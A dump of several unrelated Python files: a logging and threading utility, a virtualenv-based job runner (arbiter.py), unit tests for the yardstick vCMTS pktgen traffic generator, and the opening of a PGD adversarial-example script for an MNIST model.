TIME_ACCURACY = 1  # Time accuracy (seconds). Smaller is not always better: if one Task loop iteration takes longer than this value, accuracy degrades.
start_time = int(time.time())
sql_clean_time = 45
def time_to_str(times=None):
    """Format a Unix timestamp as 'YYYY-MM-DD HH:MM:SS' in UTC+8.

    Fix: the original default was ``times=time.time()``, which is evaluated
    once at import time, silently freezing the "current time" default for
    the life of the process.  Use a None sentinel and resolve the current
    time on each call instead.

    A timestamp of exactly 0 is treated as a sentinel and rendered as the
    fixed epoch string '2019-09-24 00:00:00' (original behavior).
    """
    if times is None:
        times = time.time()
    if times == 0:
        return '2019-09-24 00:00:00'
    # Shift by 8 hours to render in UTC+8.
    date_array = datetime.datetime.utcfromtimestamp(times + (8 * 3600))
    return date_array.strftime("%Y-%m-%d %H:%M:%S")
def get_filename():
    """Path of this run's log file: ~/.anduin/<script>-<start_time>.log."""
    script = sys.argv[0].split('/')[-1]
    return '%s/.anduin/%s-%s.log' % (os.path.expanduser('~'), script, start_time)
# Module-level logging setup: resolve the log path, make sure ~/.anduin
# exists, and open the log file in append mode for the rest of the module.
fn = get_filename()
# if sys.platform != 'win32':
try:
    # Best-effort: mkdir fails harmlessly (error is printed) when the
    # directory already exists.
    os.mkdir('%s/.anduin'%os.path.expanduser('~'))
except Exception as e:
    print(str(e))
# (message: "anduin call log is saved at %s")
print('anduin调用日志保存在%s'%get_filename())
# else:
#     print('该操作系统为windows系统,暂时无法保存日志')
# NOTE(review): fh stays open for the process lifetime and is never closed.
fh = open(fn, 'a')
def dbg(*args):
    """Print *args* with an engine timestamp prefix and, on non-Windows
    platforms, append the same record to the module log file."""
    record = ['[%s Anduin Engine]' % time_to_str(int(time.time()))]
    record.extend(args)
    print(*record)
    if sys.platform != 'win32':
        for item in record:
            fh.write(str(item) + ' ')
        fh.write('\n')
def IntervalTask(sec, func, params=(), immediatly=True, thread_name=''):
    """Run func(*params) forever on a new thread, sleeping *sec* seconds
    between calls.  With immediatly=False the first call is also delayed.

    NOTE: the worker thread loops forever and is not a daemon; it keeps
    the process alive (original behavior).
    """
    def loop_forever(*call_args):
        if immediatly is False:
            time.sleep(sec)
        while True:
            func(*call_args)
            time.sleep(sec)

    worker = threading.Thread(target=loop_forever, args=params)
    if thread_name != '':
        worker.name = thread_name
    worker.start()
def normal_task(sec, func, params=(), thread_name=''):
    """Call func(*params) exactly once on a new thread, after a
    *sec*-second delay."""
    def delayed_call(*call_args):
        time.sleep(sec)
        func(*call_args)

    worker = threading.Thread(target=delayed_call, args=params)
    if thread_name != '':
        worker.name = thread_name
    worker.start()
# threading.enumerate()
# dbg(threading.enumerate())
def func_time(f):
    """Decorator: log (via dbg) how long each call to *f* takes.

    :param f: function to wrap
    :return: wrapper that times f and returns its result unchanged
    """
    @wraps(f)
    def wrapper(*args, **kwargs):
        started = time.time()
        result = f(*args, **kwargs)
        finished = time.time()
        dbg(str(f.__name__) + ' took ' + str(finished - started) + ' seconds ')
        return result
    return wrapper
def create_async_event(async_r):
    """Run coroutine *async_r* to completion on a brand-new event loop and
    return its result."""
    fresh_loop = asyncio.new_event_loop()
    asyncio.set_event_loop(fresh_loop)
    future = asyncio.ensure_future(async_r)  # schedule on the new loop
    fresh_loop.run_until_complete(future)    # drive the loop until done
    return future.result()
def get_async_result(async_r):
    """Schedule coroutine *async_r* on the current event loop without
    waiting for it (fire-and-forget; returns None)."""
    current_loop = asyncio.get_event_loop()
    current_loop.create_task(async_r)
def get_async_result_sql(async_r):
    """Run coroutine *async_r* on the current event loop, block until it
    completes, and return its result."""
    current_loop = asyncio.get_event_loop()
    sql_task = current_loop.create_task(async_r)
    current_loop.run_until_complete(sql_task)
    return sql_task.result()
def get_db_index(db_config_dict):
    """Build a 'user@host:database' key from a DB config dict."""
    parts = (db_config_dict['user'], '@', db_config_dict['host'], ':', db_config_dict['database'])
    return ''.join(parts)
if "__main__" == __name__:
# res = [(1,2,3),(4,5,6),(7,8,9)]
# dbg(turbo(foo,res))
get_filename()
|
arbiter.py | import logging
import os
import subprocess
import threading
from enum import Enum
from os.path import expanduser
from psutil import Popen
from smart_getenv import getenv
from virtualenvapi.manage import VirtualEnvironment
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class ProcessState(Enum):
    """Lifecycle states reported by an Arbiter-managed process."""

    RUNNING = "running"
    FAILED = "failed"
    STOPPED = "stopped"
class Arbiter:
    """Runs a versioned job package in its own virtualenv-backed process
    and tracks the run on a background thread.
    """

    def __init__(
        self,
        script_type,
        package_name,
        version,
        notify_failure,
        notify_retry,
        env,
    ):
        self.type = script_type
        self.package_name = package_name
        self.version = version
        # pip requirement spec pinning the exact job version.
        self.package = f"{self.package_name}=={self.version}"
        self.notify_failure = notify_failure
        self.notify_retry = notify_retry
        # One dedicated virtualenv per (package, version) pair.
        self.venv_name = f"kirby-{self.package_name}-{self.version}"
        self.venv_created = False
        self.env = env
        # (returncode, stdout) of the last finished run, or None.
        self._process_return_value = None
        self._thread = None

    def ensure_environment(self, venvs_directory=None):
        """Create (or reuse) the job's virtualenv and install its package.

        Falls back to $KIRBY_VENV_DIRECTORY (default ~/.kirby/virtualenvs)
        when no directory is given.  Returns the VirtualEnvironment.
        """
        if not venvs_directory:
            venvs_directory = getenv(
                "KIRBY_VENV_DIRECTORY",
                default=expanduser("~/.kirby/virtualenvs"),
            )
        venv_path = os.path.join(venvs_directory, self.venv_name)
        # Fix: use the module logger instead of the root logger for
        # consistency with the rest of this module.
        logger.info(f"creating venv for {self.venv_name} at {venv_path}")
        env = VirtualEnvironment(venv_path)
        env.install(self.package_name)
        return env

    def raise_process(self):
        """Run `python -m <package>` inside the venv and record its result."""
        venv = self.ensure_environment()
        args = [
            os.path.join(venv.path, "bin", "python"),
            "-m",
            self.package_name,
        ]
        process = Popen(args, env=self.env, stdout=subprocess.PIPE)
        # Fix: read stdout while waiting.  The original wait()-then-read
        # pattern can deadlock once the child fills the stdout pipe buffer.
        stdout, _ = process.communicate()
        self._process_return_value = process.returncode, stdout.decode("utf-8")

    def run(self, block=False):
        """Start the job on a background thread; optionally wait for it."""
        self._thread = threading.Thread(target=self.raise_process)
        self._thread.start()
        if block:
            self.join()

    def get_return_values(self):
        """(returncode, stdout) of the last run, or None if none finished."""
        return self._process_return_value

    def join(self):
        # TODO : Catch thread's errors
        if self.status == ProcessState.RUNNING:
            self._thread.join()

    @property
    def status(self):
        """ProcessState of the managed run; None when never started."""
        if self._thread:
            if self._thread.is_alive():
                return ProcessState.RUNNING
            return ProcessState.STOPPED
|
test_tg_vcmts_pktgen.py | # Copyright (c) 2019 Viosoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
import socket
import threading
import time
import os
import copy
from yardstick.benchmark.contexts import base as ctx_base
from yardstick.network_services.vnf_generic.vnf.base import VnfdHelper
from yardstick.network_services.vnf_generic.vnf import tg_vcmts_pktgen
from yardstick.common import exceptions
NAME = "tg__0"
class TestPktgenHelper(unittest.TestCase):
    """Unit tests for tg_vcmts_pktgen.PktgenHelper."""

    def test___init__(self):
        helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
        self.assertEqual(helper.host, "localhost")
        self.assertEqual(helper.port, 23000)
        self.assertFalse(helper.connected)

    def _run_fake_server(self):
        # Accept exactly one connection on localhost:23000, then shut down.
        listener = socket.socket()
        listener.bind(('localhost', 23000))
        listener.listen(0)
        client_socket, _ = listener.accept()
        client_socket.close()
        listener.close()

    def test__connect(self):
        helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
        # No server listening yet: the raw connect attempt must fail.
        self.assertFalse(helper._connect())
        fake_server = threading.Thread(target=self._run_fake_server)
        fake_server.start()
        time.sleep(0.5)  # give the server thread time to bind and listen
        self.assertTrue(helper._connect())
        helper._sock.close()
        fake_server.join()

    @mock.patch('yardstick.network_services.vnf_generic.vnf.tg_vcmts_pktgen.time')
    def test_connect(self, *args):
        # Already connected: connect() is a no-op success.
        helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
        helper.connected = True
        self.assertTrue(helper.connect())
        # Underlying _connect succeeds: state flips to connected.
        helper.connected = False
        helper._connect = mock.MagicMock(return_value=True)
        self.assertTrue(helper.connect())
        self.assertTrue(helper.connected)
        # Underlying _connect fails: stays disconnected.
        helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
        helper._connect = mock.MagicMock(return_value=False)
        self.assertFalse(helper.connect())
        self.assertFalse(helper.connected)

    def test_send_command(self):
        helper = tg_vcmts_pktgen.PktgenHelper("localhost", 23000)
        # Not connected: sending fails outright.
        self.assertFalse(helper.send_command(""))
        # Connected but socket unusable: still fails.
        helper.connected = True
        helper._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.assertFalse(helper.send_command(""))
        # Healthy (mocked) socket: succeeds.
        helper._sock = mock.MagicMock()
        self.assertTrue(helper.send_command(""))
class TestVcmtsPktgenSetupEnvHelper(unittest.TestCase):
    """Unit tests for tg_vcmts_pktgen.VcmtsPktgenSetupEnvHelper.

    Fix: replaced ``assertEquals`` with ``assertEqual`` — the deprecated
    alias was removed in Python 3.12.
    """

    # Expected pktgen launch command built from PKTGEN_POD_VALUES[0].
    PKTGEN_PARAMETERS = "export LUA_PATH=/vcmts/Pktgen.lua;"\
                        "export CMK_PROC_FS=/host/proc;"\
                        " /pktgen-config/setup.sh 0 4 18:02.0 "\
                        "18:02.1 18:02.2 18:02.3 00:00.0 00:00.0 "\
                        "00:00.0 00:00.0 imix1_100cms_1ofdm.pcap "\
                        "imix1_100cms_1ofdm.pcap imix1_100cms_1ofdm.pcap "\
                        "imix1_100cms_1ofdm.pcap imix1_100cms_1ofdm.pcap "\
                        "imix1_100cms_1ofdm.pcap imix1_100cms_1ofdm.pcap "\
                        "imix1_100cms_1ofdm.pcap"

    # Scenario options fed to the mocked scenario helper.
    OPTIONS = {
        "pktgen_values": "/tmp/pktgen_values.yaml",
        "tg__0": {
            "pktgen_id": 0
        },
        "vcmts_influxdb_ip": "10.80.5.150",
        "vcmts_influxdb_port": 8086,
        "vcmtsd_values": "/tmp/vcmtsd_values.yaml",
        "vnf__0": {
            "sg_id": 0,
            "stream_dir": "us"
        },
        "vnf__1": {
            "sg_id": 0,
            "stream_dir": "ds"
        }
    }

    def setUp(self):
        """Build a setup helper around mocked ssh/scenario helpers."""
        vnfd_helper = VnfdHelper(
            TestVcmtsPktgen.VNFD['vnfd:vnfd-catalog']['vnfd'][0])
        ssh_helper = mock.Mock()
        scenario_helper = mock.Mock()
        scenario_helper.options = self.OPTIONS
        self.setup_helper = tg_vcmts_pktgen.VcmtsPktgenSetupEnvHelper(
            vnfd_helper, ssh_helper, scenario_helper)

    def test_generate_pcap_filename(self):
        pcap_file_name = self.setup_helper.generate_pcap_filename(\
            TestVcmtsPktgen.PKTGEN_POD_VALUES[0]['ports'][0])
        self.assertEqual(pcap_file_name, "imix1_100cms_1ofdm.pcap")

    def test_find_port_cfg(self):
        port_cfg = self.setup_helper.find_port_cfg(\
            TestVcmtsPktgen.PKTGEN_POD_VALUES[0]['ports'], "port_0")
        self.assertIsNotNone(port_cfg)
        port_cfg = self.setup_helper.find_port_cfg(\
            TestVcmtsPktgen.PKTGEN_POD_VALUES[0]['ports'], "port_8")
        self.assertIsNone(port_cfg)

    def test_build_pktgen_parameters(self):
        parameters = self.setup_helper.build_pktgen_parameters(
            TestVcmtsPktgen.PKTGEN_POD_VALUES[0])
        self.assertEqual(parameters, self.PKTGEN_PARAMETERS)

    def test_start_pktgen(self):
        self.setup_helper.ssh_helper = mock.MagicMock()
        self.setup_helper.start_pktgen(TestVcmtsPktgen.PKTGEN_POD_VALUES[0])
        self.setup_helper.ssh_helper.send_command.assert_called_with(
            self.PKTGEN_PARAMETERS)

    def test_setup_vnf_environment(self):
        self.assertIsNone(self.setup_helper.setup_vnf_environment())
class TestVcmtsPktgen(unittest.TestCase):
    """Unit tests for tg_vcmts_pktgen.VcmtsPktgen.

    Also hosts the shared fixture data (VNFD, pod values, scenario and
    context configs) referenced by the other test classes in this module.
    """

    # Minimal VNF descriptor catalog for the pktgen traffic generator.
    VNFD = {'vnfd:vnfd-catalog':
            {'vnfd':
             [{
                 "benchmark": {
                     "kpi": [
                         "upstream/bits_per_second"
                     ]
                 },
                 "connection-point": [
                     {
                         "name": "xe0",
                         "type": "VPORT"
                     },
                     {
                         "name": "xe1",
                         "type": "VPORT"
                     }
                 ],
                 "description": "vCMTS Pktgen Kubernetes",
                 "id": "VcmtsPktgen",
                 "mgmt-interface": {
                     "ip": "192.168.24.150",
                     "key_filename": "/tmp/yardstick_key-a3b663c2",
                     "user": "root",
                     "vdu-id": "vcmtspktgen-kubernetes"
                 },
                 "name": "vcmtspktgen",
                 "short-name": "vcmtspktgen",
                 "vdu": [
                     {
                         "description": "vCMTS Pktgen Kubernetes",
                         "external-interface": [],
                         "id": "vcmtspktgen-kubernetes",
                         "name": "vcmtspktgen-kubernetes"
                     }
                 ],
                 "vm-flavor": {
                     "memory-mb": "4096",
                     "vcpu-count": "4"
                 }
             }]
             }}

    # Two pktgen pod configurations (ids "0" and 1), each with 8 ports;
    # unused ports carry the placeholder PCI address 00:00.0.
    PKTGEN_POD_VALUES = [
        {
            "num_ports": "4",
            "pktgen_id": "0",
            "ports": [
                {
                    "net_pktgen": "18:02.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_0": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "18:02.1",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_1": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "18:02.2",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_2": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "18:02.3",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_3": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "00:00.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_4": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "00:00.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_5": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "00:00.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_6": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "00:00.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_7": "",
                    "traffic_type": "imix1"
                }
            ]
        },
        {
            "num_ports": 4,
            "pktgen_id": 1,
            "ports": [
                {
                    "net_pktgen": "18:0a.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_0": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "18:0a.1",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_1": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "18:0a.2",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_2": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "18:0a.3",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_3": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "00:00.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_4": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "00:00.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_5": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "00:00.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_6": "",
                    "traffic_type": "imix1"
                },
                {
                    "net_pktgen": "00:00.0",
                    "num_ofdm": "1",
                    "num_subs": "100",
                    "port_7": "",
                    "traffic_type": "imix1"
                }
            ]
        }
    ]

    # Scenario configuration as handed to instantiate().
    SCENARIO_CFG = {
        "nodes": {
            "tg__0": "pktgen0-k8syardstick-a3b663c2",
            "vnf__0": "vnf0us-k8syardstick-a3b663c2",
            "vnf__1": "vnf0ds-k8syardstick-a3b663c2"
        },
        "options": {
            "pktgen_values": "/tmp/pktgen_values.yaml",
            "tg__0": {
                "pktgen_id": 0
            },
            "vcmts_influxdb_ip": "10.80.5.150",
            "vcmts_influxdb_port": 8086,
            "vcmtsd_values": "/tmp/vcmtsd_values.yaml",
            "vnf__0": {
                "sg_id": 0,
                "stream_dir": "us"
            },
            "vnf__1": {
                "sg_id": 0,
                "stream_dir": "ds"
            }
        },
        "task_id": "a3b663c2-e616-4777-b6d0-ec2ea7a06f42",
        "task_path": "samples/vnf_samples/nsut/cmts",
        "tc": "tc_vcmts_k8s_pktgen",
        "topology": "k8s_vcmts_topology.yaml",
        "traffic_profile": "../../traffic_profiles/fixed.yaml",
        "type": "NSPerf"
    }

    # Kubernetes context (networks + node access details) for instantiate().
    CONTEXT_CFG = {
        "networks": {
            "flannel": {
                "name": "flannel"
            },
            "xe0": {
                "name": "xe0"
            },
            "xe1": {
                "name": "xe1"
            }
        },
        "nodes": {
            "tg__0": {
                "VNF model": "../../vnf_descriptors/tg_vcmts_tpl.yaml",
                "interfaces": {
                    "flannel": {
                        "local_ip": "192.168.24.150",
                        "local_mac": None,
                        "network_name": "flannel"
                    },
                    "xe0": {
                        "local_ip": "192.168.24.150",
                        "local_mac": None,
                        "network_name": "xe0"
                    },
                    "xe1": {
                        "local_ip": "192.168.24.150",
                        "local_mac": None,
                        "network_name": "xe1"
                    }
                },
                "ip": "192.168.24.150",
                "key_filename": "/tmp/yardstick_key-a3b663c2",
                "member-vnf-index": "1",
                "name": "pktgen0-k8syardstick-a3b663c2",
                "private_ip": "192.168.24.150",
                "service_ports": [
                    {
                        "name": "ssh",
                        "node_port": 60270,
                        "port": 22,
                        "protocol": "TCP",
                        "target_port": 22
                    },
                    {
                        "name": "lua",
                        "node_port": 43619,
                        "port": 22022,
                        "protocol": "TCP",
                        "target_port": 22022
                    }
                ],
                "ssh_port": 60270,
                "user": "root",
                "vnfd-id-ref": "tg__0"
            },
            "vnf__0": {
                "VNF model": "../../vnf_descriptors/vnf_vcmts_tpl.yaml",
                "interfaces": {
                    "flannel": {
                        "local_ip": "192.168.100.132",
                        "local_mac": None,
                        "network_name": "flannel"
                    },
                    "xe0": {
                        "local_ip": "192.168.100.132",
                        "local_mac": None,
                        "network_name": "xe0"
                    },
                    "xe1": {
                        "local_ip": "192.168.100.132",
                        "local_mac": None,
                        "network_name": "xe1"
                    }
                },
                "ip": "192.168.100.132",
                "key_filename": "/tmp/yardstick_key-a3b663c2",
                "member-vnf-index": "3",
                "name": "vnf0us-k8syardstick-a3b663c2",
                "private_ip": "192.168.100.132",
                "service_ports": [
                    {
                        "name": "ssh",
                        "node_port": 57057,
                        "port": 22,
                        "protocol": "TCP",
                        "target_port": 22
                    },
                    {
                        "name": "lua",
                        "node_port": 29700,
                        "port": 22022,
                        "protocol": "TCP",
                        "target_port": 22022
                    }
                ],
                "ssh_port": 57057,
                "user": "root",
                "vnfd-id-ref": "vnf__0"
            },
            "vnf__1": {
                "VNF model": "../../vnf_descriptors/vnf_vcmts_tpl.yaml",
                "interfaces": {
                    "flannel": {
                        "local_ip": "192.168.100.134",
                        "local_mac": None,
                        "network_name": "flannel"
                    },
                    "xe0": {
                        "local_ip": "192.168.100.134",
                        "local_mac": None,
                        "network_name": "xe0"
                    },
                    "xe1": {
                        "local_ip": "192.168.100.134",
                        "local_mac": None,
                        "network_name": "xe1"
                    }
                },
                "ip": "192.168.100.134",
                "key_filename": "/tmp/yardstick_key-a3b663c2",
                "member-vnf-index": "4",
                "name": "vnf0ds-k8syardstick-a3b663c2",
                "private_ip": "192.168.100.134",
                "service_ports": [
                    {
                        "name": "ssh",
                        "node_port": 18581,
                        "port": 22,
                        "protocol": "TCP",
                        "target_port": 22
                    },
                    {
                        "name": "lua",
                        "node_port": 18469,
                        "port": 22022,
                        "protocol": "TCP",
                        "target_port": 22022
                    }
                ],
                "ssh_port": 18581,
                "user": "root",
                "vnfd-id-ref": "vnf__1"
            }
        }
    }

    # Temp file written/removed by the instantiate() tests below.
    PKTGEN_VALUES_PATH = "/tmp/pktgen_values.yaml"

    # Sample pktgen Helm-style values YAML used to drive instantiate().
    PKTGEN_VALUES = \
        "serviceAccount: cmk-serviceaccount\n" \
        "images:\n" \
        "  vcmts_pktgen: vcmts-pktgen:v18.10\n" \
        "topology:\n" \
        "  pktgen_replicas: 8\n" \
        "  pktgen_pods:\n" \
        "    - pktgen_id: 0\n" \
        "      num_ports: 4\n" \
        "      ports:\n" \
        "        - port_0:\n" \
        "          traffic_type: 'imix2'\n" \
        "          num_ofdm: 4\n" \
        "          num_subs: 300\n" \
        "          net_pktgen: 8a:02.0\n" \
        "        - port_1:\n" \
        "          traffic_type: 'imix2'\n" \
        "          num_ofdm: 4\n" \
        "          num_subs: 300\n" \
        "          net_pktgen: 8a:02.1\n" \
        "        - port_2:\n" \
        "          traffic_type: 'imix2'\n" \
        "          num_ofdm: 4\n" \
        "          num_subs: 300\n" \
        "          net_pktgen: 8a:02.2\n" \
        "        - port_3:\n" \
        "          traffic_type: 'imix2'\n" \
        "          num_ofdm: 4\n" \
        "          num_subs: 300\n" \
        "          net_pktgen: 8a:02.3\n" \
        "        - port_4:\n" \
        "          traffic_type: 'imix2'\n" \
        "          num_ofdm: 4\n" \
        "          num_subs: 300\n" \
        "          net_pktgen: 8a:02.4\n" \
        "        - port_5:\n" \
        "          traffic_type: 'imix2'\n" \
        "          num_ofdm: 4\n" \
        "          num_subs: 300\n" \
        "          net_pktgen: 8a:02.5\n" \
        "        - port_6:\n" \
        "          traffic_type: 'imix2'\n" \
        "          num_ofdm: 4\n" \
        "          num_subs: 300\n" \
        "          net_pktgen: 8a:02.6\n" \
        "        - port_7:\n" \
        "          traffic_type: 'imix2'\n" \
        "          num_ofdm: 4\n" \
        "          num_subs: 300\n" \
        "          net_pktgen: 8a:02.7\n"

    def setUp(self):
        """Build a VcmtsPktgen with mocked server/resource/setup helpers."""
        vnfd = self.VNFD['vnfd:vnfd-catalog']['vnfd'][0]
        self.vcmts_pktgen = tg_vcmts_pktgen.VcmtsPktgen(NAME, vnfd)
        self.vcmts_pktgen._start_server = mock.Mock(return_value=0)
        self.vcmts_pktgen.resource_helper = mock.MagicMock()
        self.vcmts_pktgen.setup_helper = mock.MagicMock()

    def test___init__(self):
        """Constructor wires up helpers and starts with traffic stopped."""
        self.assertFalse(self.vcmts_pktgen.traffic_finished)
        self.assertIsNotNone(self.vcmts_pktgen.setup_helper)
        self.assertIsNotNone(self.vcmts_pktgen.resource_helper)

    def test_extract_pod_cfg(self):
        """extract_pod_cfg returns the pod matching the id, else None."""
        pod_cfg = self.vcmts_pktgen.extract_pod_cfg(self.PKTGEN_POD_VALUES, "0")
        self.assertIsNotNone(pod_cfg)
        self.assertEqual(pod_cfg["pktgen_id"], "0")
        pod_cfg = self.vcmts_pktgen.extract_pod_cfg(self.PKTGEN_POD_VALUES, "4")
        self.assertIsNone(pod_cfg)

    @mock.patch.object(ctx_base.Context, 'get_context_from_server',
                       return_value='fake_context')
    def test_instantiate_missing_pktgen_values_key(self, *args):
        """instantiate raises KeyError when 'pktgen_values' is absent."""
        err_scenario_cfg = copy.deepcopy(self.SCENARIO_CFG)
        err_scenario_cfg['options'].pop('pktgen_values', None)
        with self.assertRaises(KeyError):
            self.vcmts_pktgen.instantiate(err_scenario_cfg, self.CONTEXT_CFG)

    @mock.patch.object(ctx_base.Context, 'get_context_from_server',
                       return_value='fake_context')
    def test_instantiate_missing_pktgen_values_file(self, *args):
        """instantiate raises RuntimeError when the values file is missing."""
        if os.path.isfile(self.PKTGEN_VALUES_PATH):
            os.remove(self.PKTGEN_VALUES_PATH)
        err_scenario_cfg = copy.deepcopy(self.SCENARIO_CFG)
        err_scenario_cfg['options']['pktgen_values'] = self.PKTGEN_VALUES_PATH
        with self.assertRaises(RuntimeError):
            self.vcmts_pktgen.instantiate(err_scenario_cfg, self.CONTEXT_CFG)

    @mock.patch.object(ctx_base.Context, 'get_context_from_server',
                       return_value='fake_context')
    def test_instantiate_empty_pktgen_values_file(self, *args):
        """instantiate raises RuntimeError on an empty values file."""
        yaml_sample = open(self.PKTGEN_VALUES_PATH, 'w')
        yaml_sample.write("")
        yaml_sample.close()
        err_scenario_cfg = copy.deepcopy(self.SCENARIO_CFG)
        err_scenario_cfg['options']['pktgen_values'] = self.PKTGEN_VALUES_PATH
        with self.assertRaises(RuntimeError):
            self.vcmts_pktgen.instantiate(err_scenario_cfg, self.CONTEXT_CFG)
        if os.path.isfile(self.PKTGEN_VALUES_PATH):
            os.remove(self.PKTGEN_VALUES_PATH)

    @mock.patch.object(ctx_base.Context, 'get_context_from_server',
                       return_value='fake_context')
    def test_instantiate_invalid_pktgen_id(self, *args):
        """instantiate raises KeyError for a pktgen_id with no pod config."""
        yaml_sample = open(self.PKTGEN_VALUES_PATH, 'w')
        yaml_sample.write(self.PKTGEN_VALUES)
        yaml_sample.close()
        err_scenario_cfg = copy.deepcopy(self.SCENARIO_CFG)
        err_scenario_cfg['options'][NAME]['pktgen_id'] = 12
        with self.assertRaises(KeyError):
            self.vcmts_pktgen.instantiate(err_scenario_cfg, self.CONTEXT_CFG)
        if os.path.isfile(self.PKTGEN_VALUES_PATH):
            os.remove(self.PKTGEN_VALUES_PATH)

    @mock.patch.object(ctx_base.Context, 'get_context_from_server',
                       return_value='fake_context')
    def test_instantiate_all_valid(self, *args):
        """instantiate succeeds and records the matching pod config."""
        yaml_sample = open(self.PKTGEN_VALUES_PATH, 'w')
        yaml_sample.write(self.PKTGEN_VALUES)
        yaml_sample.close()
        self.vcmts_pktgen.instantiate(self.SCENARIO_CFG, self.CONTEXT_CFG)
        self.assertIsNotNone(self.vcmts_pktgen.pod_cfg)
        self.assertEqual(self.vcmts_pktgen.pod_cfg["pktgen_id"], "0")
        if os.path.isfile(self.PKTGEN_VALUES_PATH):
            os.remove(self.PKTGEN_VALUES_PATH)

    def test_run_traffic_failed_connect(self):
        """run_traffic raises PktgenActionError when connect() fails."""
        self.vcmts_pktgen.pktgen_helper = mock.MagicMock()
        self.vcmts_pktgen.pktgen_helper.connect.return_value = False
        with self.assertRaises(exceptions.PktgenActionError):
            self.vcmts_pktgen.run_traffic({})

    def test_run_traffic_successful_connect(self):
        """run_traffic connects once and issues the pktgen start command."""
        self.vcmts_pktgen.pktgen_helper = mock.MagicMock()
        self.vcmts_pktgen.pktgen_helper.connect.return_value = True
        self.vcmts_pktgen.pktgen_rate = 8.0
        self.assertTrue(self.vcmts_pktgen.run_traffic({}))
        self.vcmts_pktgen.pktgen_helper.connect.assert_called_once()
        self.vcmts_pktgen.pktgen_helper.send_command.assert_called_with(
            'pktgen.start("all");')
|
pgd.py | import os
import time
import csv
import numpy as np
import argparse
from multiprocessing import Process, Pipe, cpu_count
# --- CLI ------------------------------------------------------------------
parser = argparse.ArgumentParser(description='')
parser.add_argument('--model', type=str, required=True, help='Path to model')
parser.add_argument('--epsilon', type=float, required=True, help='Epsilon')
parser.add_argument('--pgd_epsilon', type=float, required=True, help='Epsilon')
parser.add_argument('--im', type=int, required=True, help='Image number')
parser.add_argument('--it', type=int, default=500, help='Iterations')
parser.add_argument('--threads', type=int, default=None, help='Number of threads')
args = parser.parse_args()
# Load the selected MNIST test image (label in column 0, pixels after).
csvfile = open('mnist_test_comp.csv', 'r')
tests = csv.reader(csvfile, delimiter=',')
tests = list( tests )
test = tests[ args.im ]
image= np.float64(test[1:len(test)])
corr_label = int( test[ 0 ] )
# Epsilon-ball bounds around the image, clamped to the pixel range [0, 255].
specLB = np.copy(image)
specUB = np.copy(image)
specLB -= args.epsilon
specUB += args.epsilon
specLB = np.maximum( 0, specLB )
specUB = np.minimum( 255, specUB )
# Extra PGD arguments passed through to pgd_div.pgd.
# NOTE(review): assumed to be (step bounds, step bounds, restarts, steps) —
# confirm against pgd_div's signature.
pgd_args = ( args.pgd_epsilon*np.ones_like(specLB), args.pgd_epsilon*np.ones_like(specLB), 5, 100)
# Default to one worker slot per CPU core.
if args.threads is None:
    args.threads = cpu_count()
def create_pool(corr_label, args):
    """Spawn one PGD worker process per candidate label (every label except
    *corr_label*), pinned round-robin across args.threads CPUs.

    Returns the parent ends of the worker pipes and the process handles.
    """
    conns = []
    procs = []
    parent_pid = os.getpid()
    worker_idx = 0
    for target_label in range(10):
        if target_label == corr_label:
            continue  # never attack toward the true label
        parent_conn, child_conn = Pipe()
        conns.append(parent_conn)
        worker = Process(target=thread,
                         args=(worker_idx % args.threads, target_label, args, child_conn))
        worker.start()
        procs.append(worker)
        worker_idx += 1
    return conns, procs
def thread( proc_id, i, args, conn ):
    """PGD attack worker: try to push the model's prediction to label *i*.

    Pinned to CPU *proc_id*.  Sends either (i, adversarial_example) or
    (i, False) to the parent over *conn*, then idles until it receives
    'kill'.  Uses module-level specLB/specUB/pgd_args bounds.
    """
    # Imports are deferred so TensorFlow is only loaded in worker processes.
    import tensorflow as tf
    from pgd_div import create_pgd_graph, pgd
    from tensorflow.contrib import graph_editor as ge
    print( 'Proc', proc_id )
    # Pin this worker to a single CPU core.
    os.sched_setaffinity(0,[proc_id])
    model_path = args.model
    sess = tf.Session()
    # Load the frozen model graph.
    with tf.gfile.FastGFile(model_path, 'rb') as f:
        graph_def = tf.GraphDef()
        graph_def.ParseFromString(f.read())
